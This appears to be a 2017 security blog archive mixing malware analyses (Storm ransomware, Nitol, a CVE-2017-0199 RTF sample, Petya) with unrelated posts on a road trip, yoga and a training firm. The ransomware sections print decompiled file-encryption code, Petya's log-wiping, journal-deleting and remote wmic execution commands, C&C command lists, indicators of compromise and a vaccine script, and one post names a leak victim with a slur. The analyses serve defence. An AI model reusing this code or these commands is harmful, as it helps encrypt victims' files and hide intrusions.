Custom search

Monday, August 7, 2017

Malspam Email Analysis by Malware Traffic Analysis Team:

In recent post of malware traffic analysis, they done a good analysis on malspam emails and how that spam campaign works. Please refer their post:

Please refer the following links to download the files of email, pcap, etc.
Zip archive of the emails:   11.5 kB (11,482 bytes)

Zip archive of the pcap:   54.6 kB (54,572 bytes)

Zip archive of the malware and artifacts:   1.01 MB (1,008,835 bytes)

Note: ZIP files are password-protected with the standard password.

Post made by

Monday, July 31, 2017

Breach and leak in Mandiant

Imagine how it embarrassing when a pick pocket steal the stuffs from cops which is same when hackers hack in to the system of threat intelligence analyst. Yes, the hacker hacked in to the system of threat intelligence analyst from Mandiant Security. It was one billion USD worth company when FireEye acquired them in 2014. Leaked dump contains sensitive information such as network topology, threat intelligence profiles for the Defence forces from Israel. And also it contains company worksheets. #leakTheAnalyst is the tag found in the social network.

When we look in to the leaked details it shows that how hugely they targeted the particular threat intelligence analyst. We feel it could be an insider job by targeting one particular employee, kind of spy inside the organisation.

This is a depth of the breach shown in the leak. Let see the below snapshot:
One of the worst thing is it kills the career of cyber-security person called Adi Peretz.
Victim #1 Profile:
--- Name: Adi Peretz
--- Op. Nickname: Mr. Muscle AKA FatFuck
--- Position: Senior Threat Intelligence Analyst at Mandiant

In the leak they mentioned as the victim analyst got a HR interview with Novartis and they sarcastically mentioned as it might be cancelled. 

Post made by

Sunday, July 30, 2017

Road Trip Experience From Our Friend: (Chennai to Thiruvarur via PondiCherry - To and fro):

This post is regarding road trip experience as post from our friend. They actually from Chennai to Thiruvarur via Pondicherry. It was almost 300 km distance and most of the time it was raining during the journey.
Chennai to Thiruvarur Via Pondicherry (aka Puducherry)
They started their journey on Friday early morning 12:05 AM. Before the journey starts they were like it takes 7 hours to reach Thiruvarur. And the filled fuel tank for 1000 rs, i.e. nearly 15 litres of petrol. The cost of the petrol 67 rs and some paise. The gang started their journey and chose OMR road (old mahabalipuram road) reached Pondicherry by 1:45 AM. Actually that is best speed ever I heard. Usually the time taken to reach Pondicherry is almost 3 hours but the gang reached there in 1 hour 40 minutes.
In that they taken a stop and good tea. They had a chat regarding petrol price in Pondicherry and directly went to the nearest petrol pump. For their surprise, petrol price was only 63 rs and some paise. They put petrol for 1700 rs. and it was a good saving. Again they started from Pondicherry heading towards Thiruvarur, they heard like it had some heavy raining hours back, but luckily during their travel they seen only good lightning. Google Map is the best guide for them during the whole journey. And saavn the songs app, helped them to stay focused and keep up the enjoyment without any sleep. Only peppy numbers where hitting their sound systems.
And they reached Thiruvarur before 5 AM. That was so fast. They saved more than 2 hours in the journey.

Thiruvarur Tank on Map

Travelling Back To Chennai:

This time they started at 10:35 PM on Saturday night. Within a minute they got struck in the temple function traffic. The rally of temple idol worshipping statues were going and people where watching and praying in the street. Good fireworks were seen in the night.
The video of  temple function is in the above video. Check this rally function.

During the journey, it had good raining and they captured the video of that and uploaded in the youtube.

 These videos taken during heavy rain in their journey back to Chennai. This time despite of rain they reached Chennai in same five hour. Kind of fast and furious driving.

Enjoy the journey!!!

Post created by

Storm Ransomware:

Today we are analysing a malware sample and its hash is 791b700810e356339066b67f2f4febc9089b5541d602946a243dfb15e6f3918e. It is referred as storm ransomware sample.

Storm Ransomware
The sample is compiled with .net compiler. Here is the snapshot of the .net compiler detected in that file. Reversing that code is very much possible. Let's try on that.
.net compiled
Interesting strings presence:

0000000052EF   0000004070EF      0   Property can only be set to Nothing
000000005337   000000407137      0   WinForms_RecursiveFormCreate
000000005371   000000407171      0   WinForms_SeeInnerException
0000000053CF   0000004071CF      0   .accdb
0000000053E7   0000004071E7      0   .aepx
00000000547B   00000040727B      0   .class
0000000054FD   0000004072FD      0   .docb
000000005509   000000407309      0   .docm
000000005515   000000407315      0   .docx
00000000552B   00000040732B      0   .dotm
000000005537   000000407337      0   .dotx
000000005593   000000407393      0   .idml
0000000055A9   0000004073A9      0   .indb
0000000055B5   0000004073B5      0   .indd
0000000055C1   0000004073C1      0   .indl
0000000055CD   0000004073CD      0   .indt
0000000055ED   0000004073ED      0   .java
0000000055F9   0000004073F9      0   .jpeg
000000005623   000000407423      0   .m3u8
000000005693   000000407493      0   .mpeg
00000000578F   00000040758F      0   .potm
00000000579B   00000040759B      0   .potx
0000000057A7   0000004075A7      0   .ppam
0000000057C7   0000004075C7      0   .ppsm
0000000057D3   0000004075D3      0   .ppsx
0000000057E9   0000004075E9      0   .pptm
0000000057F5   0000004075F5      0   .pptx
000000005801   000000407601      0   .prel
00000000580D   00000040760D      0   .prproj
0000000058A3   0000004076A3      0   .sldm
0000000058AF   0000004076AF      0   .sldx
000000005965   000000407765      0   .xlam
000000005999   000000407799      0   .xlsb
0000000059A5   0000004077A5      0   .xlsm
0000000059B1   0000004077B1      0   .xlsx
0000000059C7   0000004077C7      0   .xltm
0000000059D3   0000004077D3      0   .xltx
000000005A0F   00000040780F      0   Label1
000000005A1E   00000040781E      0   _______________________________________________________________________________________
000000005ACE   0000004078CE      0   Button1
000000005AE4   0000004078E4      0   Microsoft Sans Serif
000000005B0E   00000040790E      0   Label2
000000005B1C   00000040791C      0   Storm Ransomware
000000005B3E   00000040793E      0   RichTextBox1
000000005B5A   00000040795A      0   Label3
000000005B68   000000407968      0   Send mony to my bitcoin :
000000005B9C   00000040799C      0   Label5
000000005BB2   0000004079B2      0   Label6
000000005BC0   0000004079C0      0   Contact Me : 
000000005BDC   0000004079DC      0   Button2
000000005BF6   0000004079F6      0   TextBox1
000000005C08   000000407A08      0   Form1
000000005C22   000000407A22      0   taskmgr.exe
000000005C3A   000000407A3A      0   ProcessHacker.exe
000000005C5E   000000407A5E      0   FullName
000000005C82   000000407A82      0   Hassan
000000005C90   000000407A90      0   HassanAmiri
000000005CA8   000000407AA8      0   Winrar
000000005CB7   000000407AB7      0   Hello You Are Hacked Now !! All your personal files have been encrypted ! if you want restore your data you have to pay ! Remember you can't restore your data without our decryptor !!!!
000000005E2B   000000407C2B      0   ertyuioppoiuhygtfrdeRFTGYHDEZEFFZEF
000000005E73   000000407C73      0   StormRansomware(at)gmail(dot)com

This list of strings give more details about the file extension or file types targeted by the storm ransomware. And it also give the details on functioning buttons like send moeny to my bitcoin, contact me. It also shown the email id - StormRansomware(at)gmail(dot)com.
Possibly email id and password details will be there. We disassembled the code and please refer the following snapshots of the code:

Email id and password details
Process detail
The following code snippet is regards to the cryptography related stuffs:
public static void EC(string nombre, string password)
byte[] array = new byte[32];
Encoding.Default.GetBytes(password).CopyTo(array, 0);
RijndaelManaged rijndaelManaged = new RijndaelManaged
Mode = CipherMode.CBC,
KeySize = 256,
BlockSize = 256,
Padding = PaddingMode.Zeros
byte[] array2 = File.ReadAllBytes(nombre);
MemoryStream memoryStream = new MemoryStream();
CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(array, array), CryptoStreamMode.Write);
cryptoStream.Write(array2, 0, array2.Length);
byte[] array3 = memoryStream.ToArray();
byte[] array4 = new byte[checked(array3.Length - 1 + 1)];
array3.CopyTo(array4, 0);
File.WriteAllBytes(nombre, array4);

Currently top AV vendors are detecting this variant. And the famous detection name is MSIL crypter.

Post made by

Wednesday, July 26, 2017

Recent spam campaign

This is about recent spam campaign. We request companies to take care of the warning. Refer this image.
Post by newWorld 

Simple Note on Yoga and Meditation:

Yoga and meditation will bring peace and harmony to our human body as well as for the whole world. Relieving stress from our body will fire up the neurons and bring superior performance on the selected field. Imagine if that performance is added up with laser sharp focus then the output is highly respectable. To achieve that state, Yoga and meditation (two sides of the same coin) will help in that journey.

Note by

Friday, July 21, 2017

கம்ப்யூட்டர் வைரஸ் - தமிழில் (computer virus in Tamil)

நண்பர்களே!!! நாம் கற்க வேண்டிய அனைத்து தொழில்நுட்பம் மற்றும் அறிவியல் படைப்புக்களை மக்கள் தங்கள் தாய் மொழியில் கற்றால், முன்னேற்றம் என்பது உறுதி !!!

அதன் முதல் படியாக... எங்கள் இணையத்தளமானது, தமிழ் வழியில் தொழில்நுட்பம் மற்றும் அறிவியல் படைப்புக்களை கொண்டுச்செல்ல முற்படிகிறது.

கம்ப்யூட்டர் வைரஸ் என்றல் என்ன?
மனிதர்கள் எவ்வாறு வைரஸ் போன்ற நுண்கிருமியால் தாக்கப்படுகிறாரகளோ, அது போல் நமது கம்ப்யூட்டரும் வைரஸ் ப்ரோக்ராமால் தாக்கப்படுகிறது. வைரஸ் என்பது ஒரு ப்ரோக்ராம், அந்த ப்ரோக்ராம் என்றால் ... பல கட்டளைகளை அடுக்காக செயல்பட எழுதப்பட்டதே ப்ரோக்ராம் ஆகும்.
கணினி செயல் பட நம்மக்கு அப்பேரடிங் சிஸ்டம் தேவை. இதில் பல செயலிகள் மற்றும் மென்பொருள்கள் அடக்கம். இந்த வைரஸ் ப்ரோக்ராம் ஆனது அப்பேரடிங் சிஸ்டம் ப்ரோக்ராம்களை தாக்கி, அதனுள் தன்னுடைய கட்டளைகளை சேர்த்து விடும். மற்றும் அந்த மென்பொருளின் கட்டளைகளை பல சமயங்களில் அளித்து விடும்.

பின்னர் வரும் கட்டுரைகளில் இதை பற்றி முழுமையாக பார்ப்போம் ...

(பல எழுத்து பிழைகள் இருக்கும் ... வருந்துகிறோம்...)

புதிய உலகம் !!!

Thursday, July 20, 2017

Banking Malware Campaign in Excel:

In recent campaign for banking malware in excel file is found in the wild. Security researchers from Lmntrix done their research on this and shared their analysis in the recent post.
Please refer their post:

Post made by

Command to change the file extensions inside the folder:

Let us take a simple scenario. You got a file and it can be executable or non pe file, without any extension. To run that file, you need to keep the file in correct extension eg: .pdf, .ppt, .js, .exe, etc.
Press F2 key after selecting the file will prompt the user to change the file name. So the user can easily change the file name (it includes the extension of the file).

What if you need to change 'n' number of files extension inside the folder?
It is not easy to chose each and every file then changing the extension of the file inside the folder.
We will give you simple command:

ren *.* *.jpg
ren *.* *.exe

The first comment will add .jpg extension for the files inside the folder. And the second one is changing the extension to .exe. Pretty simple commands will get the job done.
Renaming files extension inside the folder
Refer the above snapshot how it worked in windows platform.

Post made by

Tuesday, July 11, 2017

Analysis of Nitol:

About Nitol:

  • Nitol is a family of Trojan that performs DDoS (distributed denial of service) attacks, allow backdoor access and control, download and run files and perform a number of other malicious activities on your computer. The Botnet is accessed from a Dynamic DNS Service.
History of Nitol (Discovery):
  • The Trojan was preloaded during the assembly and manufacturing process in China that came brand new from the factory. These Laptops and Desktops were sold in large numbers (may be because of cheap price) which lead the distribution world-wide. 
  • In August 2011, researchers on the Microsoft Digital Crimes Unit purchased 20 computers (10 laptops and 10 Desktops) from various cities in China. 4 out of 20 machines were found to be infected with malware, and one of those infectors was Nitol.

Malware Name
HTTP Backdoor
FTP Backdoor
Suspicious – non-malicious
IRC Backdoor

  • The computer that was preloaded with Nitol was the only one that was actively running and had attempted to connect to a command and control (C&C) server.
  • Infection statistics of Nitol taken from Microsoft Telemetry.

The most commonly used Nitol Domains:

Distribution of Malware Using
  • On 10 September 2012 Microsoft took action against the Nitol Botnet by obtaining a court order and subsequently Sink-holing the domain.
  •  Microsoft later settled with operator Pen Yong, which allowed the latter to continue operating the domain on the condition that any subdomains linked to malware remain sink-holed
  • Status - 
Behaviour of Nitol:
  • Nitol Spreads through removable media and and mapped network shares. It picks directories that contain applications (.EXE, .DLL, .OCX files) and compressed file archives (e.g. .RAR and .ZIP). File attributes SYSTEM/READ-ONLY/HIDDEN. This is done by exploiting the module loading process used by Windows with an infected file LPK.DLL (Component of Microsoft Language Pack - Lpksetup.exe).
  • LPK.DLL is used to exploit the module loading process used by Windows when it runs applications. Since applications look for LPK.DLL in their current directory before any other place, Nitol will get loaded before the file (of the same name) provided by Microsoft in the System32 directory.

We got the yara rules for this Nitol variant:
Yara Rule
rule Nitol : Nitol
        $a = {5E 26 2A 2E 68 74 6D}
        $b = {25 63 25 63 25 63 25 63 25 63 25 63 2E 65 78 65} 
       $C = {4C 70 6B}
        $a and $b and $C

Components of Nitol:

  • Installer
  • Dropper - (Infected LPK and Backdoor)
  • Downloaded files for DDOS
 [Detection Info]
    * Filename: C:\Documents and Settings\Norman\Desktop\Nitol.
    * Sandbox name: W32/Obfuscated.MA.
    * Signature name: NOT_SCANNED.
    * Compressed: NO.
    * TLS hooks: NO.
    * Executable type: Library (DLL).
    * Executable file structure: OK.
    * Filetype: PE_I386.
 [General information]
    * Accesses executable file from resource section
 * Drops files in %WINSYS% folder.
    * Anti debug/emulation code present.
    * File length:        46592 bytes.
    * MD5 hash: b339de14bae1157e652b0ea7d070113e.
    * SHA1 hash: 99624d63106ccff4a2e2feb9d32437bfd2f183ab.
 [Changes to file-system]
    * Creates file C:\Windows\Temp\tmp.1.
    * Creates file C:\WINDOWS\system32\sqqggi.exe.
    * Creates file C:\WINDOWS\TEMP\SOFTWARE.LOG.
    * Deletes file C:\Windows\Temp\tmp.1.

[Changes to registry]
    * Accesses Registry key "HKLM\SYSTEM\CurrentControlSet\Services\Distribulgs"

    * Creates key "HKLM\System\CurrentControlSet\Services\Distribulgs".
    * Sets value "ImagePath"="C:\WINDOWS\system32\sqqggi.exe" in key "HKLM\System\CurrentControlSet\Services\Distribulgs".
    * Sets value "DisplayName"="Distribuoax Transaction Coordinator Service" in
key "HKLM\System\CurrentControlSet\Services\Distribulgs".
    * Sets value "Description"="Distribueuu Transaction Coordinator Service." in
 key "HKLM\System\CurrentControlSet\Services\Distribulgs".
 [Process/window information]
    * Creates a mutex Distribulgs.
    * Creates process "tmp.1".
    * Creates service "Distribulgs (Distribuoax Transaction Coordinator Service)
" as "C:\WINDOWS\system32\sqqggi.exe".
    * Creates process "sqqggi.exe".
    * Creates an unnamed event.
* Creates process "svchost.exe".
    * Reads memory in process "svchost.exe".
    * Modifies memory in process "svchost.exe".
    * Modified OS kernel function code in process "svchost.exe".

Static Analysis
MD5 - B339DE14BAE1157E652B0EA7D070113E
The working of the sample is shown clearly in Sandbox.
The file is a DLL that has the executable in the Resource Data. 
101 – Mutex
102 – Executable
The Executable also has a file in the resource
33 - DLL

The working of the Installer is Simple
Find the Resource  ( Mutex and Dropper)
Register the Mutex
Drop a file from the RCData Dropper in the %temp% with prefix hrn
Infection code for loading Hidden copy of lpk.dll and code for spreading

The working is shown clearly in the Diagram:

Now the main file of Nitol has dropped a file in Windows\System32 and also dropped a copy of infected LPK.DLL with name hra33.dll which is later deleted.

Dropped %C%C%C%C%C%C.exe
MD5 - B339DE14BAE1157E652B0EA7D070113E
  • This sample is the most important part of the Analysis as this is responsible for creating the service, Registry Entry, Downloading files, Performing DDOS attacks.
  • It can be observed that the file is having a lot of NOP’s right from the winmain of the Dropped file which might be place-holder to be replaced by active instructions later on in program development.
Creation of service -

Dropped file in temp with prefix hrl given a random name of six characters -
Injection of code in Svchost.exe:
Svchost.exe in memory:
Network Connectivity related Events:

The connectivity is not established because of the take down of the botnet:

  • There are some binaries downloaded by Nitol to perform these actions 
  • plusctrl.dll – MD5 - 99E6D6A21A452A24759FD50FB2874BCE
  • hra%u.dll (hra32.dll) – MD5 - 22F2C6088367D608D455ED73527DA02B
  • Stf%C%C%C%C%C.exe
  • These files are downloaded and are used by the Command and Control server for performing various actions.

C&C command ID:

0x01 (1)
  Receive Component
    Send a new module to the computer to run.
0x02 (2) 
  Unknown but DDOS Specific
    Nitol connects to target address via TCP, UDP, or RAW.
0x03 (3) 
  Unknown but DDOS Specific
    Possible floods: SYN, TCP, UDP, ICMP, HTTP.
___C&C may command sleep for specific time
0x04 (4)
  Unknown but DDOS Specific
    Possible floods: SYN, TCP, UDP, ICMP, HTTP.
__C&C may command sleep for specific time. 
0x05 (5) 
  Stop Work
   Stop DDOS’ing target computers
0x06 (6)
  Clean up
    Delete, set file attributes to Normal. Exits
0x10 (16)
  Download & Run
  Specify URL and filename to download from Internet Save file in temp directory under filename “stf[5 random letters].exe” ,Execute saved file
0x12 (18)
   Delete existing service, Download new executable from specified URL, Save file in temp directory under filename “stf[5 random letters].exe” , Execute saved file

0x13 (19)
  Open URL
    Launch Internet Explorer (specifically) with specified URL
0x20 (32)
  Start Work 
    Start DDOS’ing target computers
0x14 (20)
  Open URL as Current User
   Launch Internet Explorer (specifically) with specified URL
0x77 (119)
  Get Computer Information
   Get computer information and send to C&C , Computer Local (e.g. EN-US)  , Computer Name , Operating System Name , Amount of memory (RAM) , CPU Speed , Nitol Flag (possibly version number) , Nitol Work DLL flag , Timestamp

  • Most of AV vendors detect the malware with names Nitol, MicroFake and ServStart.
  • Antivirus or antimalware software with latest definition will remove the Nitol infection.
  • Use caution when opening attachments and accepting file transfers.
  • More caution while using removable media. Disable autorun/autoplay via group policy. 
  • Use strong passwords and never use weak or default passwords. (Since Nitol variants have the ability spread via removable media and mapped network shares).
Post made by

Thursday, July 6, 2017

Nutpam - Unique way of learning new technologies

Nutpam - Unique way of learning new technologies

Learn coding and make software is a passion for many people. Those people need learning resources to get achieve their goal and become software developer and best programmers. With that dream, many people in India enrols them in computer teaching centres and join computer engineering courses. The way of teaching is not best and many frustrated to get the job after completing their course. After many struggle only, many land their dream profession. In a country like India, the need for computer programmers is growing in exponential rate. But if we check their understanding of the programming concepts then answer seems not positive. Based on all these points in mind few people stand out and trying to fill that missing pieces. In that way, we are going to see about Nutpamsoftware.
Aim of the Nutpam software
Aim of the Nutpam Software:

Their aim is to take technologies to the youngsters of India in such a way that each individual get a large scope of knowledge in practical working rather than just completing their degree. They were formed in the aim of creating a path break to change the current education system. Their ultimate goal in this process is to creating Powerful Man (Entrepreneurs) by imparting the complete knowledge about the Technology while they pursue their education.

Teaching style

They come with idea of ‘Pora Pokkula Programming’ meaning ‘programming on they walk’. It is by giving memes and videos in simpler way to understand the programming concepts.
Let see some example images (memes) they created by nutpam:

Addition program

This is simple addition program. Very easy to understand how the program is working!!!

Error 1: Use of Unassigned variable
Unassigned Variable
Error 2: Cannot implicitly convert from datatype1 to datatype2
Error 2

Future Vision
·         To Highlight the value of the course, the engineering students studying and make them more confident on what they can do. One step ahead in near future we are planning to ensure technology practices to younger generation in school level.
·         To launch a programming language in Tamil so that in future every developer working the language would have a more précised knowledge in development.

Nutpam COO’S Interview

Achievements by their students

Nutpam students placement where updated in their facebook page. They recently completed their first year anniversary. 
Nutpam First year anniversary
Final year project


Sample Demo Classes Online

 Post by

Wednesday, July 5, 2017

Analysis of Malicious RTF file: CVE-2017-0199

CVE-2017-0199 is found in the latest malware campaign. For this vulnerability, patch was already available in Microsoft security updates. This vulnerability is about the execution of arbitrary code via a crafted document by remote attackers.

Sample analysis
We got the rtf file for analysis:

Using officemalscanner tools (rtfscan)- 

[*] SCAN mode selected
[*] Opening file C:\Documents and Settings\Desktop\fe2e5d0543b4c8769e401e
[*] Filesize is 6215 (0x1847) Bytes
RTF file format detected. Please use RTFScan.

fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.bin: Rich Text Format data, version 1, unknown character set
MD5: 51c028cd5f3afe9bf179d81def8d7a8e

Embedded OLE document extracted
We extracted the embedded ole document from this sample. And the following image have string details:

Strings of OLE object
We tried with rtfdump to the same sample and we get as follows:
We further drilled down that embedded object and we found interesting information in that.
Malicious file URL
It downloading file called myguy.xls from a suspicious IP address.
We searched it in VT:

VirusTotal result for that malicious link

Patch already released by Microsoft on April 2017. It is advised to block this malicious url in firewall/proxy. 

Post made by

Saturday, July 1, 2017

Petya Ransomware Attack Wave

After Wannacry ransomware attack, Petya ransomware comes with new wave of attack. This ransomware campaign is currently taking place which has already impacted companies in countries across the world including the Ukraine, Spain, Russia, Netherlands, France, and India. Industries which we are aware of that have already been hit by this cyber-attack include the telecommunications, banking, transportation, life sciences, food & beverage, and power & utilities sectors.
The criminals behind the ransomware are requesting a ransom USD 300 in bitcoin – reportedly to be paid within three days - or else all files on the computer will be deleted (see screenshot below).

Possible mode of entry:
Petya ransomware spreading mechanism is email spam in the form of boobytrapped Office documents. These documents use the CVE-2017-0199 Office RTF vulnerability to download the installer and it leads to the execution of SMB worm to spreading like Wannacry ransomware. Wikileaks
For this CVE, the given description is:
Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."

The generalized description as execution of arbitrary code using crafter document by remote attackers. Remote attackers meant that mode of entry as email spam. We received samples for analysis and based on our analysis we made the following findings.
Sample: SHA 256: 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
Actually this sample is very famous due to the many researchers given their opinion on this sample. So while doing our manual analysis, we simultaneously found the automated analysis report in the online platforms. But that sample is dll file, so we choose to continue our manual analysis. During our analysis, we also received another dll sample:
SHA 256: 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
We compared the compilation time of those samples and found mostly similar in timestamp.

The file properties are almost similar but when we checked the libraries and it is confirmed. Both this files are similar behavior only.
crypt32.dll     Crypto API32
iphlpapi.dll     IP Helper API
ws2_32.dll     Windows Socket 2.0 32-Bit DLL
mpr.dll                  Multiple Provider Router DLL
netapi32.dll        Net Win32 API DLL
dhcpsapi.dll        DHCP Server API Stub DLL
The above dll were used by ransomware samples during encryption, downloading, etc. Our interest goes to crypto API, which have the following functions called CryptBinaryToStringW,
CryptStringToBinaryW, CryptDecodeObjectEx. These functions used in converting array of bytes to formatted strings. Further we look in to the strings of the file and we noticed the encryption related strings:
·         CryptReleaseContext
·         CryptAcquireContext
·         CryptGenRandom
·         CryptExportKey
·         CryptAcquireContext
·         CryptSetKeyParam
·         CryptImportKey
·         CryptEncrypt
·         CryptGenKey
·         CryptDestroyKey
And after that we looked in to very interesting strings:
·         Microsoft Enhanced RSA and AES Cryptographic Provider
·         README.TXT
·         kernel32.dll
·         iphlpapi.dll
·         SeTcbPrivilege
·         SeShutdownPrivilege
·         SeDebugPrivilege
·         ComSpec
·         \cmd.exe
·         wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D
·         dllhost.dat
·         wbem\wmic.exe
process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1  Application & fsutil usn deletejournal /D

Since this is dll file (non com dll) it needs to register via rundll32.exe. We know that no user going to call the rundll32.exe to execute a dll file, meaning a normal user don’t know how the dlls are executed. Actually dll files are executed by the parent exe files. If we look in to the codes and strings, we can see the rundll32.exe calling and where our sample is stored.
·         00000001338C   00001001418C      0   ComSpec
·         00000001339C   00001001419C      0   \cmd.exe
·         0000000133B0   0000100141B0      0   wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
·         0000000134A8   0000100142A8      0   schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d
·         000000013520   000010014320      0   at %02d:%02d %ws
·         000000013544   000010014344      0   shutdown.exe /r /f
·         00000001356C   00001001436C      0   /RU "SYSTEM"
·         00000001358C   00001001438C      0   dllhost.dat
·         0000000135FB   0000100143FB      0   u%s \\%s -accepteula -s
·         000000013630   000010014430      0   -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1
·         0000000136A0   0000100144A0      0   wbem\wmic.exe
·         0000000136C0   0000100144C0      0   %s /node:"%ws" /user:"%ws" /password:"%ws"
·         000000013718   000010014518      0   process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1
·         0000000137B4   0000100145B4      0   \\%s\admin$
·         0000000137CC   0000100145CC      0   \\%ws\admin$\%ws
·         000000015468   000010016C68      0   c:\Windows\
·         000000015480   000010016C80      0   rundll32.exe
·         000000016CD0   0000100184D0      0   rundll32.exe
·         000000016CF0   0000100184F0      0   c:\Windows\
In the above strings, we clear see that process call create which goes to rundll32.exe (physical location). And it again point to the physical location file in windows location. But this didn’t confirm whether this sample or any other files to be executed. So I copied the dll file to windows folder and execute the following command:
rundll32.exe <sample name.dll> #1
After that step, I refer the code of the dll and found the following:

So there is some connection between the file execution, schtasks and shutdown.exe. After executing dll, we saw schedule task is added.

It created At1 and scheduled for exactly one hour after the creation of this schedule task. Our guess or instinct says it is for shutdown call like we saw in the previous screen shot.

Our analysis is correct that schedule task actually for shutdown the system. After the restart it brings to ransom note page:

So we cannot access our file and it is encrypted. Payment instructions, bitcoin wallet details and purchased key prompt is blinking to enter. We randomly type some text and it throws incorrect key error.
Email address associated with this ransomware:
Current status of this email address:
Posteo is an email service provider offering the paid email accounts. In this petya ransomware case, attackers used posteo address as a contact option. Their abuse team checked this and blocked that contact address.
Hence, paying the ransom can’t be assured that victim will receive the decryption key from the attackers. They can’t contact the attacker using the email address.
We collected associated domains and ip for detection purpose with this post.
Ransomware spreading Url:
·         benkow(.)cc
·         Coffeinoffice(.)xyz
·         french-cooking(.)com
·         sundanders(.)online
·         casconut(.)xyz
·         blumbeerg(.)xyz  
·         insurepol(.)in
·         whitefoam(.)org(.)uk
·         xfusion(.)co(.)uk  
·         affliates(.)in  
·         hyporus(.)in
·         dantan(.)club  
·         kababmachatu(.)xyz  
·         damodot(.)xyz 
·         ballotvize(.)xyz
Bitcoin addresses: 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
C&C payment servers:
·         mischapuk6hyrn72(.)onion/
·         petya3jxfp2f7g3i(.)onion/
·         petya3sen7dyko2n(.)onion/
·         mischa5xyix2mrhd(.)onion/MZ2MMJ
·         mischapuk6hyrn72(.)onion/MZ2MMJ
·         petya3jxfp2f7g3i(.)onion/MZ2MMJ
·         petya3sen7dyko2n(.)onion/MZ2MMJ
Possible IP address
·         185.165(.)29(.)78
·         84.200(.)16(.)242
·         111.90(.)139(.)247
·         95.141(.)115(.)108
·         89.146(.)220(.)134
Action steps:
Detection rules like snort, yara were available from independent sources in the net for this petya variant. Apply those snort rules in order to detect this ransomware attacks. Blocking ransomware spreading domains and IP in the Firewall and Proxy will prevent the attack. We recommend to block SMB port access and RDP (Remote Desktop Protocol) to all computers from the internet. Port 445 and 139 for SMB and 3389 for RDP should be blocked. We request to ensure that all windows OS are patched with latest security update especially MS17-010.
Petya vaccine available as batch file from bleeping computer:

Or you can copy the following batch file and save as .bat:
@echo off
REM Administrative check from here:
REM Vaccination discovered by
REM Batch file created by Lawrence Abrams of @bleepincomputer @lawrenceabrams

echo Administrative permissions required. Detecting permissions...
net session >nul 2>&1

if %errorLevel% == 0 (
if exist C:\Windows\perfc (
echo Computer already vaccinated for NotPetya/Petya/Petna/SortaPetya.
) else (
echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc
                echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dll
                echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dat

attrib +R C:\Windows\perfc
                attrib +R C:\Windows\perfc.dll
                attrib +R C:\Windows\perfc.dat

echo Computer vaccinated for current version of NotPetya/Petya/Petna/SortaPetya.
) else (
echo Failure: You must run this batch file as Administrator.

Further Attack wave in Ukraine:
While writing of this analysis report, we came to know about wannacry clone attacks happening in Ukraine. We got three samples for analysis:
Sample1: MD5: 0BDE638B274C7F9C6C356D3987ED1A2D
Sample2: MD5: 87BE992695B752D86AEAB1116EB5393F
Sample3: MD5: 5C7C894A1CCFD8C8E0F174B0149A6601

All these three samples are .net compiled files:

Reversing the samples for analysis:
These samples shows like they were compiled on Jan 1 2016, but when we search those hashes in VT and they seems to be uploaded couple of days back only. So they were actually new samples only and compiling date seems to be customised or modified by the malware author.

The sample one shows that wannacry strains inside the code. We manually checked in other two samples too, they also have the same strains in the code. We successfully found the code of this samples.
Please find the program below:
                internal class Program
